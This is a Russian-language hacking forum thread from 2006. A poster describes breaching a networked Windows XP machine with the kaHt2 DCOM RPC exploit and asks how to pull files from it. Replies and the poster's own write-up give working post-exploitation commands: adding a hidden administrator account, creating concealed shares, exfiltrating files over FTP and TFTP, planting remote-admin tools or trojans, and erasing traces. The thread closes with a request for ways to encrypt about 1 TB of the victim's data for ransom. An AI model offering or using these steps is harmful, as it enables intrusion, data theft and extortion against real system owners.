Помогите с командной строкой
Пользователи, просматривающие топик: none
|
Зашли как: Guest
|
Имя |
Сообщение |
<< Старые топики Новые топики >> |
|
|
Помогите с командной строкой - 2006-04-08 21:55:40
|
|
|
dx386
Сообщений: 34
Оценки: 0
Присоединился: 2005-12-26 22:11:09
|
ЛЮДИ HELP PLZ!!!!!!!!
Ситуация следующая:
Заюзал эксплойт kaHt2.exe и получил доступ на удалённой машине в локальной сети. Всё это дело происходит в командной строке. На похаченной машине я нашёл нужный мне 123.txt файлик, но при просмотре его командой type 123.txt появляется следующие содержание в непонятной моему глазу кодировке: хёЄ№ тючьюцэёюЄ№ рфьшэшЄ№ Замечу, что английские буквы отображаются нормально. Вопрос в том, как увидеть сие написанное в нормальном виде??? А второй вопрос, какой командой скачать себе на комп с удалённой машины этот файлик (123.txt) через командную строку???
зы help - читал :) но там нашёл только копирование на локальной тачке, а мне нужно по сетке слить[sm=thumbs-up.gif]
|
|
|
Помогите с командной строкой - 2006-04-08 22:00:14
|
|
|
Python
Сообщений: 4964
Оценки: 0
Присоединился: 2005-12-14 08:32:13
|
Dx386, тЫ еще не знаешь где лежЫт faq? Тогда мЫ идем к тебе! Вот тут было про сплойт
|
|
|
Помогите с командной строкой - 2006-04-08 22:45:17
|
|
|
dx386
Сообщений: 34
Оценки: 0
Присоединился: 2005-12-26 22:11:09
|
Млин спасибо, что отправил почитать доки :/ Но я так и не нашёл нужной инфы. В особенности, как:
"при просмотре его командой type 123.txt появляется следующие содержание в непонятной моему глазу кодировке: хёЄ№ тючьюцэёюЄ№ рфьшэшЄ№ Замечу, что английские буквы отображаются нормально. Вопрос в том, как увидеть сие написанное в нормальном виде??? Второй вопрос, какой командой скачать себе на комп с удалённой машины этот файлик (123.txt) через командную строку??? "
|
|
|
Помогите с командной строкой - 2006-04-09 04:46:25
|
|
|
Lex_Voodoo
Сообщений: 7328
Оценки: 0
Присоединился: 2004-12-07 13:55:12
|
1. chcp 1251 (по дефолту стоит 866) 2. через FTP
|
|
|
Помогите с командной строкой - 2006-04-09 09:00:30
|
|
|
dx386
Сообщений: 34
Оценки: 0
Присоединился: 2005-12-26 22:11:09
|
Попробовал chcp 1251, но ситуация не изменилась, опять каракули :/, работает только на локальном компьютере. В общем получается вот так, что при chcp 866 русские буквы в названиях директорий нормально видятся, но содержимое файла type 123.txt в каракулях, а при chcp 1251 русские буквы в названиях дир-й косячные и содержимое файла type 123.txt тож не есть гуд:
C:\dосиmеnts and Settings>chcp 1251 chcp 1251 Текущая кодовая страница: 1251
C:\dосиmеnts and Settings>dir dir ╥юь т єёЄЁющёЄтх C шьххЄ ьхЄъє SYSTEM ╤хЁшщэ√щ эюьхЁ Єюьр: 43B4-47CF
╤юфхЁцшьюх яряъш C:\dосиmеnts and Settings
01.01.1997 02:30 <DIR> . 01.01.1997 02:30 <DIR> .. 01.01.1997 02:30 <DIR> All Users 01.01.1997 23:06 <DIR> └фьшэшёЄЁрЄюЁ 03.03.2006 21:11 <DIR> NetShowServices 0 Їрщыют 0 срщЄ 5 яряюъ 28а946а202а624 срщЄ ётюсюфэю
C:\dосиmеnts and Settings>chcp 866 chcp 866 Текущая кодовая страница: 866
C:\dосиmеnts and Settings>dir dir Содержимое папки C:\dосиmеnts and Settings
01.01.1997 02:30 <DIR> . 01.01.1997 02:30 <DIR> .. 01.01.1997 02:30 <DIR> All Users 01.01.1997 23:06 <DIR> Администратор 03.03.2006 21:11 <DIR> NetShowServices 0 файлов 0 байт 5 папок 28 783 247 360 байт свободно
C:\dосиmеnts and Settings>
Может быть какой-нибудь другой способ прочитать содержимое этого файла? Или может быть есть каки-нибудь проги которые могут переконвертить из этой кодировки в нормальныю?
|
|
|
Помогите с командной строкой - 2006-04-09 09:20:02
|
|
|
dx386
Сообщений: 34
Оценки: 0
Присоединился: 2005-12-26 22:11:09
|
C ftp тоже не проканало. Пробовал разные фтп-шники от geneftp до serv-u. результат следующий: _________________________________________________ KAHT II - MASSIVE RPC EXPLOIT DCOM RPC exploit. Modified by aT4r@3wdesign.es #haxorcitos && #localhost @Efnet Ownz you!!! PUBLIC VERSION :P ________________________________________________
[+] Targets: 192.168.110.27-192.168.110.29 with 50 Threads [+] Attacking Port: 135. Remote Shell at port: 33055 [+] Scan In Progress… - Connecting to 192.168.110.28 Sending Exploit to a [WinXP] Server… - Conectando con la Shell Remota…
Microsoft windоws XP [Версия 5.1.2600] (С) Корпорация Майкрософт, 1985-2001.
C:\windоwS\system32>ftp ftp open 192.168.110.1 Пользователь (192.168.110.1:(none)): nnm
А дальше все-е-е-е стоит колом, движения ноль, не коннектится, чё делать хз. Хотя сам проверял у себя на тачке, к себе на фтп захожу спокойно, а вот с удалённой машины не катит :/ ИНФА из файла нужна позарез.
|
|
|
Помогите с командной строкой - 2006-04-09 10:57:32
|
|
|
z0nata
Сообщений: 5
Оценки: 0
Присоединился: 2005-07-24 19:20:32
|
После получения шелла создай админа у него.
net user xakep pass /add net localgroup Administrators xakep /add ^^^^^^^^^^^^^^ Или Администраторы, если винда русская
Потом расшарь ему диск net share x=c:
Потом на своей машине подключи этот ресурс net use x: \\его.айп.ишн.ик\x (логин и пасс соответственно те, что вводил выше)
потом удаляй все свои выкрутасы, чтоб не запалится
|
|
|
Помогите с командной строкой - 2006-04-09 11:40:10
|
|
|
dx386
Сообщений: 34
Оценки: 0
Присоединился: 2005-12-26 22:11:09
|
УРААА!!! Мегаруль, содержимое файла 123. txt прочитал :-) установил плагин CharacterMap v.3.2 к FAR (Far PowerPack v. 1.07) там и посмотрел его в нужной кодировке. Кулл, едим дальше. Спасибо за помощь ребята. Вери гуд хелп.
|
|
|
Помогите с командной строкой - 2006-04-09 12:03:18
|
|
|
UM9I
Сообщений: 19
Оценки: 0
Присоединился: 2006-03-26 16:39:01
|
net share C$$=C: расшаривание дисков net share d$$=D: ^^^^^^^^^^^^^^^^^^^^^^^ copy \\xxx.xxx.xxx.xxx\имя_расшаренной папки\имя файла\ \\yyy.yyy.yyy.yyy.\имя_расшареной_папки назначения\имя_файла
Это с компьютера с IP xxx.xxx.xxx.xxx скопировать на yyy.yyy.yyy.yyy файл
^^^^^^^^^^^^^^^^^^^^^^^ net share C$$ /delete - удаление шар net share D$$ /delete
|
|
|
Помогите с командной строкой - 2006-04-09 12:28:34
|
|
|
dx386
Сообщений: 34
Оценки: 0
Присоединился: 2005-12-26 22:11:09
|
WOW ещё лучше!!! Я только хотел задать этот вопрос, как ты уже на него ответил!!!! СПАСИБО огромное.
|
|
|
Помогите с командной строкой - 2006-04-09 13:23:29
|
|
|
dx386
Сообщений: 34
Оценки: 0
Присоединился: 2005-12-26 22:11:09
|
Всё прекрасно, НО попутно возникло ещё пару вопросов:
- расшариваю ему диск D:\ командой net share d$$=D: (знак доллара делает эту шару не видимой в сетевом окружении)
- затем в строке браузера IE ввожу \\192.168.110.28\d$$ и попадаю к нему в корень диска D:\
вопрос в том, что не могу ни куда дальше перемещаться у него по винту. появляется ошибка след. содержнаия: "Нет доступа к \\192.168.110.28\d$$\мои документы. Возможно у вас нет прав на использование этого сетевого ресурса. Обратитесь к администратору этого сервера для получения соответствующих прав доступа. Отказано в доступе." Как быть????
По совету z0nata, я создал себе у него на машине пользователя(x) с паролем (123) и поместил в группы админов. Но не совсем вкурил как именно к нему зайти созданным пользователем (x) и с паролем (123) как мне советовал z0nata??? ——————————– "Потом на своей машине подключи этот ресурс net use x: \\его.айп.ишн.ик\x (логин и пасс соответственно те, что вводил выше)" ——————————–
Вопрос нумер два to UM9I:
Командой copy \\192.168.110.28\D$$\мои документы\123.exe c:\ - происходит копирование файла 123.exe ЕМУ же на диск C:\ Ну а мне то нужно себе на тачку эту инфу слить по сети и всё в той же командой строке. Или я что-то не так делаю??? Подскажите мне пожалуйста я ещё только учусь. Желательно с примером :) Спасибо.
|
|
|
Помогите с командной строкой - 2006-04-09 13:42:51
|
|
|
UM9I
Сообщений: 19
Оценки: 0
Присоединился: 2006-03-26 16:39:01
|
Ну тиак залевай на ту машину RAdmina и потом делай фто хочеш! :) Вот ти лучша раскажи чо за Sploit,я его заюзал,пишет "[+] Targets: 10.0.0.2-10.0.0.51 with 300 Threads [+] Attacking Port: 135. Remote Shell at port: 42185 [+] Scan In Progress…"_ и без реакцй=\
|
|
|
Помогите с командной строкой - 2006-04-09 14:23:10
|
|
|
Dun
Сообщений: 26
Оценки: 0
Присоединился: 2006-04-07 14:19:55
|
2dx386 >"Командой copy \\192.168.110.28\D$$\мои документы\123.exe c:\ - происходит копирование файла 123.exe ЕМУ же на диск C:\ Ну а мне то нужно себе" А ты не забыл случайно указать ип свой??????? перед c:\ по идее должно быть так:
\\192.168.110.28\D$$\мои документы\123.exe \\тв.ой.ай.пи\c:\
Смотри внимательнее что писал UM9I: ————————————– copy \\xxx.xxx.xxx.xxx\имя_расшаренной папки\имя файла\ \\yyy.yyy.yyy.yyy.\имя_расшареной_папки назначения\имя_файла
Это с компьютера с IP xxx.xxx.xxx.xxx скопировать на yyy.yyy.yyy.yyy файл ————————————–
2UM9I Если сплоиит так себя ведёт о его либо запалил на тачке фаервол и просто не даёт машине отвечать сплоиту… либо тачка без этой уязвимости.(фикс стоит)
|
|
|
Помогите с командной строкой - 2006-04-09 14:28:06
|
|
|
dx386
Сообщений: 34
Оценки: 0
Присоединился: 2005-12-26 22:11:09
|
Открываешь командную строку в ней пишешь до него путь где лежит kaHt2.exe после вводи его IP -1, а затем +1 в последнем октете. Например нужно похачить тачку с ip 10.0.0.2 для этого сначала вычитаем 1 и получаем (10.0.0.1) а затем прибавляем 1 к 10.0.0.2 (будет 10.0.0.3) GO-go-go-go:
C:\kaHt2.exe 10.0.0.1 10.0.0.3 жимкай Enter и если все нормально, открываеться щелл,вида:
С:\windоws\system32\> дальше можешь хулиганить как вздумается :-)
ps это работает только на тех машинах, которые подвержены этой уязвимости!
|
|
|
Помогите с командной строкой - 2006-04-09 14:57:46
|
|
|
dx386
Сообщений: 34
Оценки: 0
Присоединился: 2005-12-26 22:11:09
|
2 Dun _______________________________________________ KAHT II - MASSIVE RPC EXPLOIT DCOM RPC exploit. Modified by aT4r@3wdesign.es #haxorcitos && #localhost @Efnet Ownz you!!! PUBLIC VERSION :P ________________________________________________
[+] Targets: 192.168.110.27-192.168.110.29 with 50 Threads [+] Attacking Port: 135. Remote Shell at port: 48933 [+] Scan In Progress… - Connecting to 192.168.110.28 Sending Exploit to a [WinXP] Server… - Conectando con la Shell Remota…
Microsoft windоws XP [Версия 5.1.2600] (С) Корпорация Майкрософт, 1985-2001.
C:\windоwS\system32>net share net share
Общее имя Ресурс Заметки
——————————————————————————- IPC$ Удаленный IPC d$$ D:\ Virtual CDs D:\Virtual CDs Музон D:\Музон Команда выполнена успешно.
C:\windоwS\system32>
Пишу так:
\\192.168.110.28\D$$\мои документы\123.exe \\192.168.110.1\С:\temp\ ай.пи. юзера мой. ай.пи.
-пишет что не найден сетевой путь. мне свою папку приёмник (temp) надо для этого расшаривать на запись?! Что не правильно?
|
|
|
Помогите с командной строкой - 2006-04-09 15:05:38
|
|
|
Dun
Сообщений: 26
Оценки: 0
Присоединился: 2006-04-07 14:19:55
|
Да а как ты собирался скинуть себе файл в закрытую для сети папку???
А вообще можно поступить проще… поставить у себя фтп сервер любой. А из его командной строки(я имею ввиду командную строку жертвы) уже юзать стандартный виндовый фтп… в консоли напиши ftp -?… и узнаешьпро все команды и как им пользоваться… Затем соединяешься со своей машиной по фтп и заливаешь себе всё что тебе заблагорассудится.
п.с. тока не разшаривай у сея весь диск =) а только одну папку.
|
|
|
Помогите с командной строкой - 2006-04-09 15:12:25
|
|
|
dx386
Сообщений: 34
Оценки: 0
Присоединился: 2005-12-26 22:11:09
|
уже пробовал, не канает
это всё делаю в его командной строке к которой получил доступ.
C:\windоwS\system32>ftp ftp open 192.168.110.1 Пользователь (192.168.110.1:(none)): nnm
А дальше все-е-е-е стоит колом, движения ноль, не коннектится, чё делать хз. Хотя сам проверял у себя на тачке, к себе на фтп захожу спокойно, а вот с удалённой машины не катит :/
|
|
|
Помогите с командной строкой - 2006-04-09 15:17:48
|
|
|
Dun
Сообщений: 26
Оценки: 0
Присоединился: 2006-04-07 14:19:55
|
У тебя фаервол стоит?? Если да то открой доступ к 21 порту на своей тачке(ну или где там у тебя висит фтп сервер)… ато он может и не пускать на него просто.
оффтоп: Python а это ваще мой ник =) только не тут =) плагиатъ =)
|
|
|
Помогите с командной строкой - 2006-04-09 15:48:27
|
|
|
dx386
Сообщений: 34
Оценки: 0
Присоединился: 2005-12-26 22:11:09
|
вырубил вообще нах фаер, не канает…
|
|
|
Помогите с командной строкой - 2006-04-09 16:17:59
|
|
|
dx386
Сообщений: 34
Оценки: 0
Присоединился: 2005-12-26 22:11:09
|
- Расшарил ему диск c:\ командой net share C$$=C: - Создал пользователя с паролем на удалённой машине и внёс его в список админов. NET USER username /ADD - заведение нового пользователя NET USER username newpassword - смена пароля пользователя username NET LOCALGROUP Администраторы username /ADD - добавление юзера username в группу Администраторов —————————————————————————————————— ВОПРОС: как теперь зайти на его тачку под этим пользователем???? А то я на расшереном ресурсе дальше диска c:\ (в IE пишу \\192.168.110.28\c$$\)никуда больше зайти не могу и ничего не могу скопировать или удалить т.к. нет прав на это. Как быть? HELP!!!!! ——————————————————————————————————- И пожалуй самый главный ВОПРОС!!! Как качать файло по сети с удалённой машины к себе на комп через командную строку (вариатны с ftp не проходят)???? Может как-то через команду TFTP, но у меня уже башка не варит… Я уже 2-ой день из комнаты не выхожу :) Этот вопрос мне не даёт спать по ночам. :-D
|
|
|
Помогите с командной строкой - 2006-04-09 21:15:17
|
|
|
dx386
Сообщений: 34
Оценки: 0
Присоединился: 2005-12-26 22:11:09
|
ВСЁЁЁЁЁЁЁЁЁЁЁЁ САМ ЖЕ И ОТВЕТИЛ НА СВОЙ ВОПРОС ))) УРААААААА!!!!! Я мегамозг!!!! :-D
Вот всё чего не хватало для полного счастья:
Вообще для того чтоб заливать файлы на комп жертвы и сливать с него себе, можно организовать на своей машине временный фтп-сервак, в этом нам поможет программа TFTPD32.
Делается так:
1) запускаем прогу 2) смотрим строку Server Interfaces, это наш сетевой ип-адрес. 3) в Settings присваиваем параметрам Time Out, Max Retransmit, Tftp port значение 69. Security - standart, все остальное оставляем по дефолту. 4) получаем понятным всем способом (при помощи kaht2) удаленную консоль в cmd.exe. tftpd32.exe и kaHt2.exe должны быть в одной папке 5) команды для управления нашим мини-фтп серваком:
c:\winnt\system32\tftp -i xxx.xxx.xxx.xxx GET proga.exe [где xxx.xxx.xxx.xxx - ваш сетевой ip-адрес, -i - этот флаг показывает на побитовую передачу файла, а proga.exe - название того, чего хотим залить жертве (этот файл также должен находится в одной папке с tftpd32.exe и kaHt2.exe)
C:\winnt\system32\tftp -i xxx.xxx.xxx.xxx PUT password.txt [где xxx.xxx.xxx.xxx - опять же НАШ ip-адрес, -i - тоже самое, password.txt - текстовый документ находящийся по пути C:/winnt/system32/ (он перекачается к нам на комп в основную папку, где кахт и фтп-сервак)
Вот я описал простейший метод приема и передачи файлов жертве. Скачать последнюю версию tftpd32 можно http://perso.wanadoo.fr/philippe.jounin/download/tftpd32.274.zip
Всем удачи и чудес, до свидания ;-)
|
|
|
Помогите с командной строкой - 2006-04-10 09:12:08
|
|
|
lipserver_new
Сообщений: 321
Оценки: 0
Присоединился: 2006-03-22 15:28:52
|
Хе!, Учимся копировать файлы с удалённого шелла? Вариантов полно: 1) copy, xcopy (надо позаботится о шарах и включенной службе доступа к файлам и принтерам) 2) Ftp: запустить у себя на компе (или использовать любой другой в инете) и коннектится к нему с удалённого шелла. 3) RA, Terminal service (это надо чем-то залить на удалённую машину), далее можно ворочать что угодно. 4) Трояны (не достаток - публичные палятся антивирусами в 99% случаев)
|
|
|
Помогите с командной строкой - 2006-04-10 12:26:41
|
|
|
Dun
Сообщений: 26
Оценки: 0
Присоединился: 2006-04-07 14:19:55
|
Ну вот и молодец… только скажи пожалуйста какая разница если ты у себя поднимешь фтп или тфтп? =) Суть в данном случае одна и та-же =) Просто ты видать его вначале не настроил… или просто не правильно настроил.
2lipserver_new Я лично предпочитаю вариант намба 2 =) Он более простой и удобный так как на любой машине в любой ос есть свой встроенный фтп клиент… и обычно на чсходящее соединение он всегда открыт.
Есть конечно маньяки-параноики, которые его блокируют фаерволами и т.п. (типа меня=)) но они редкость =)
|
|
|
Помогите с командной строкой - 2006-04-10 13:49:07
|
|
|
lipserver_new
Сообщений: 321
Оценки: 0
Присоединился: 2006-03-22 15:28:52
|
quote:
—————-<BR>Цитата: Дата:10.04.2006 12:26:41, Автор:Dun :: Я лично предпочитаю вариант намба 2 =)<BR>Он более простой и удобный так как на любой машине в любой ос есть свой встроенный фтп клиент… и обычно на чсходящее соединение он всегда открыт.<BR><BR>Есть конечно маньяки-параноики, которые его блокируют фаерволами и т.п. (типа меня=)) но они редкость =) —————-
Я тоже предпочитаю 2[sm=1.gif] и маньяк-параноик…
|
|
|
Помогите с командной строкой - 2006-04-13 22:19:05
|
|
|
dx386
Сообщений: 34
Оценки: 0
Присоединился: 2005-12-26 22:11:09
|
с ФТП никак не получилось, пробовал и так и сяк с разными серваки (хотя это роли особой не играет). То что настроил всё правильно в этом тоже нет сомнений т.к. GeneFTP6 у меня раньше стоял и я его изучил от А до Я. Наверное что-то с виндой :/ я там сервисы некоторые повырубал лишние, хотя хз:) А вот с tftp всё зафунциклило ))
|
|
|
Помогите с командной строкой - 2006-04-13 22:24:49
|
|
|
Dun
Сообщений: 26
Оценки: 0
Присоединился: 2006-04-07 14:19:55
|
у тфтп тот-же принцип работы по сути… может просто там был закрыт фтп фаерволом на исходящее соединение… Молодец что сам додумался =)
|
|
|
Помогите с командной строкой - 2006-04-13 22:26:14
|
|
|
dx386
Сообщений: 34
Оценки: 0
Присоединился: 2005-12-26 22:11:09
|
Теперь назрел другой не менее важный вопрос. Как и чем можно зашифровать файлы на удалённой машине, используя всю туже командую строку. Дело в том, что удалять всю инфу было бы очень жестоко с моей стороны, а вот зашифровать и в дальнейшем вернуть админу его инфу за $ было бы не плохо (хе-хе, зловеще). Может быть, кто-то встречал подобный софт? Поделитесь советом. А может кто-то знает, поинтересней вариант, чем шифрование???
ps инфы много (~1 ТБ), важная, бэкапы точно не сделаны.
|
|
|
|
|